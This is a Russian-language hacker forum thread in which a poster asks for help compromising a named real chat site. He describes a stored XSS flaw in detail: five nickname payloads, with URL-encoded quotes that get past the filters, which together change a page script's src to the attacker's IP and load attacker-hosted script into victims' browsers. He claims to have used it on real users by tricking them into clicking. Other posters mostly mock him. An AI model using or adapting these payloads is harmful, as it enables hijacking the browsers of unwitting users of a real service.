Помогите пожалуйста ломануть чат
http://www.chatinet.zp.ua по полной програме

Я нашёл там одну XSS пробоину Но уж больно
непросто заманить юзера

Вкратце опишу дыру может Кому интерестно будет
Есле залогинетесь под поролем Rendom то после того как вы напишете комуто сообщение в броузере появится такой код
.........<a href="Javascript: parent.send.WritePage('52656E646F6D','Rendom')"><font color="#006688"><b>Rendom</b>...............</a>


Ловите фишку ник передаётся как параметр в фунцию всёбы не чего НО всё ето происходит в
hrefe а ето значит что опасные знаки типа ' " можна прописывать в %27 и %22 обходя все фильтры
Теперь введя ник %27,alert(),%27 (%27 значит ')
получим:
....<a href="Javascript: parent.send.WritePage('52656E646F6D','%27,alert(), %27')"><font color="#006688"><b>%27,alert(),%27</b>
...............</a>

И при клике по нашему нику выполнится код между запятыми !!!!!!! УРА!!!!!!!!
Используя Apach и детскую наивность чатлан мне удалось закачать Script к ним в броузер и захватить полный кантроль Всё бы то ничего но для того чтобы закачать Script нужно заставить одного юзера нажать на пять карявых ников Что не всегда удается


Может поможите ломануть по полной програме
чтоб послал сообщение и всё и чтоб не упрашивать юзера кликать пять раз по карявым никам

Ну очень надо !!!!!!!!!
Зарание блогаларен.

ничерта не понял. то под паролем Рандом логиниться надо, то ник передается.
А Апач зачем?

Регься липовой регистрацией и оставь данные для входа. Народ посмотрит сам.

Под Rendom надо понимать любой ник
А Apach для того чтобы залить свой Script к чатлану ну тоесь у кокого нибудь скрипта
изменить значение атрибута SRC="мой IP"
Я же писал что вся загвоздка состоит в том чтобы заставить юзера последовательно кликнуть на пять вычурных ников Тем самым в его броузере выполнится код в результате у какого нибудь Scripta изменится атрибуд SRC на мой IP !

Все равно не понял.
Ну выйдешь ты за пределы ником типа 123', но толку то? Работает фильтр, длинное обрезается. Как ты путь (scr) скрипту свой прописал? Нафиг Апач?

я тоже так и не пойму о чём автор говорит.

Автор, лучше бы ты писал больше запятых, чем воскл. знаков.. Прочитать +понять смысл НЕРЕАЛЬНО

По-русски все опиши, особенно вот этот момент:

Используя Apach и детскую наивность чатлан мне удалось закачать Script к ним в броузер и захватить полный кантроль Всё бы то ничего но для того чтобы закачать Script нужно заставить одного юзера нажать на пять карявых ников Что не всегда удается

...

Ребята ну надоже хоть немного мозгами пораскинуть
ну что вы хотите чтоб я всё разжевал ???

Отвечаю на вопросы censored!

Да фильтр режет ник Но.............
поетому нужно разбить весь код по изменению SRC на пять ников
d=document
s=d.scripts[0]
p="http:\\"
p=p+"my_IP"
s.src=p
User Последовательно кликая по никам выполнит код .
А ники корявые потаму что там полавину символов заминить на %коды надо.
Ну а если ты ешё не понял зачем Apach то мой тебе совет Выпей Яду!

Автор гонит не по-детски и, по-моему, не особо шарит по теме - видимо кто-то ему что-то сказал про сайт, а он это со слов записать попытался.

Блин народ ну что ещё не понятного????
Спрашуйте...............

Поцан ыт не реально настиигал. Как у тебя Xss работает не помняно =))

Надо статью сделать "Русский язык для хакера". Какие там Xss, Sql и т.д. Русский надо знать сначала. Хотя бы чтобы тебя понимали.

Читайте пожалуйста вдумчиво!!!!!!!!

Заходим под пятью никами:

1) %27,d%3Ddocument,%27
2) %27,s%3Dd.scripts[0],%27 <--! Прошу обратить внемание, mах длина Логина 24 символа всё что после режется фильтром. Вот свезло так свизло Символ в символ -->
3) %27,p%3D"http://",%27
4) %27,p%3Dp+%27my_IP
5) %27,s.src%3Dp,%27 <--! После клика по етому нику Броузер обратится к моему компу на 80 порт по HTTP(чтобы подкачать скрипт) А там Apach висит, а в файле index.html записан Script Захватывающий контроль над броузером -->

%27 значит ' <--! Обход фильтров -->
%3D значит =

Затем упрашиваем Чатлана попорядку кликнуть по никам и ............

Если у когото будет желани проверить Логиньтесь под етими никами только неполитесь и в Главную комнату не суйтесь Пароль на все ники 123
Затем просто наведите мыш на ник и посмотрите в строку состояния броузера.


Ну вроде всё расписал подробно !!!
Ёщё будут вопросы???

Да и помогать до ламывать не надо Забудьте я пошутил.

Читайте пожалуйста вдумчиво!!!!!!!!

Заходим под пятью никами:Как ты себе это представляешь? Слушай! сними видео о том, как зайти под пятью никами...

faust45, теоретически понятно как ты хотел сделать, но на практике на том чате я не представляю.
Так чего, тему закрывать?

по видимому, да. не можем мы его допонять полностью.

Слушай censored!
Всё что я написал реально работает я всё ето проделывал лично.
Я просто думал , может на основе етой дыры кто то ломанёт ещё круче .
А никто неможет вьехать даже в расжованый XSS

Да тему закрывай.

ДА Я ЛАМЕР

а почему ник у тя фиолетовый?

Пацан ты не реально гонишь. Раз автор темы согласился закрыть её. закрывай censored!.

А никто неможет вьехать даже в расжованый XSS
Ну уж извини.

Да тему закрывай
Closed!